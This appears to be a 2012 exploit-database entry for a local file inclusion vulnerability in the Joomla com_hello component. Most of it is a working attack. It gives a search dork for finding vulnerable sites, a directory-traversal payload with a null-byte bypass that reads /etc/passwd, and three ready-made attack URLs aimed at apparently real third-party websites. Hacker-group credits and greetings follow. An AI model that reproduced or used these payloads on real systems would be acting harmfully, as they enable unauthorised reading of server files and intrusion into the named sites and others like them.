Joomla Hello component suffers from a local file inclusion vulnerability.
SSV-ID: 60289
SSV-AppDir: JoomlaVulnerabilities
Published: 2012-07-22
Exploit:
################################################################################## # Title : Joomla Component com_hello Local File Include # # Author : Ajax Security Team # # Discovered By : devilzc0der & Dominator # # Dork : inurl:"com_hello" # # h0m3 : www.ajaxtm.com # # Software Link : www.joomla.com # # Level : High ################################################################################## # p0c : # com_hello&controller=../../../../../../../../etc/passwd%00 # # Please Use Null Byte ( %00 ) for Bypas . ################################################################################## # 3xample : # # http://golden-bird.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00 # # http://etm-proekt.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00 # # http://a2-svz.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00 ################################################################################### # Special TNX t0 : Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal ################################################################################### # GreetZ : black.shadowes - hadihadi - irsdl - Mormoroth - B@RBOD & All Iranian HackerZ ###################################################################################
@Sebug.net [ 2012-07-22 ]